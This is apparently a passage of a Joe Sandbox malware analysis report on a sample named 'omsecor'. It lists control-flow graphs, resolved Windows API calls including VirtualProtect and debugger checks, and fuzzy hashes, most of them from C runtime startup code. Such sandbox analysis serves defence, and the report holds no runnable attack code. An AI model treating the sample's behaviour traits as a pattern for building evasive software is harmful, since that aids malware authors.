                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 42 407a59-407a6e 43 407a70-407a78 42->43 44 407adf 42->44 43->44 46 407a7a-407aa8 call 407a98 43->46 45 407ae1-407ae5 44->45 47 407b24 call 407b29 45->47 48 407ae7-407aef GetModuleHandleA 45->48 54 407aaa 46->54 55 407b1e-407b20 46->55 51 407af1-407af9 48->51 51->51 53 407afb-407afe 51->53 53->45 56 407b00-407b02 53->56 57 407aac-407ab0 54->57 58 407b0d-407b10 54->58 59 407b22 55->59 60 407b18-407b1d 55->60 61 407b04-407b06 56->61 62 407b08-407b0c 56->62 65 407b17 57->65 66 407ab2-407abd GetProcAddress 57->66 63 407b11-407b12 GetProcAddress 58->63 59->53 60->55 61->63 62->58 63->65 65->60 66->44 67 407abf-407acc VirtualProtect 66->67 68 407ade 67->68 69 407ace-407adc VirtualProtect 67->69 68->44 69->68
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 70 407ab5-407abd GetProcAddress 71 407adf 70->71 72 407abf-407acc VirtualProtect 70->72 75 407ae1-407ae5 71->75 73 407ade 72->73 74 407ace-407adc VirtualProtect 72->74 73->71 74->73 76 407b24 call 407b29 75->76 77 407ae7-407aef GetModuleHandleA 75->77 79 407af1-407af9 77->79 79->79 80 407afb-407afe 79->80 80->75 81 407b00-407b02 80->81 82 407b04-407b06 81->82 83 407b08-407b10 81->83 84 407b11-407b17 GetProcAddress 82->84 83->84 87 407b18-407b20 84->87 89 407b22 87->89 89->80
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 93 402f3e-402f5c HeapCreate 94 402f61-402f6e call 402ee3 93->94 95 402f5e-402f60 93->95 98 402f70-402f7d call 405045 94->98 99 402f94-402f97 94->99 98->99 102 402f7f-402f92 HeapDestroy 98->102 102->95
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
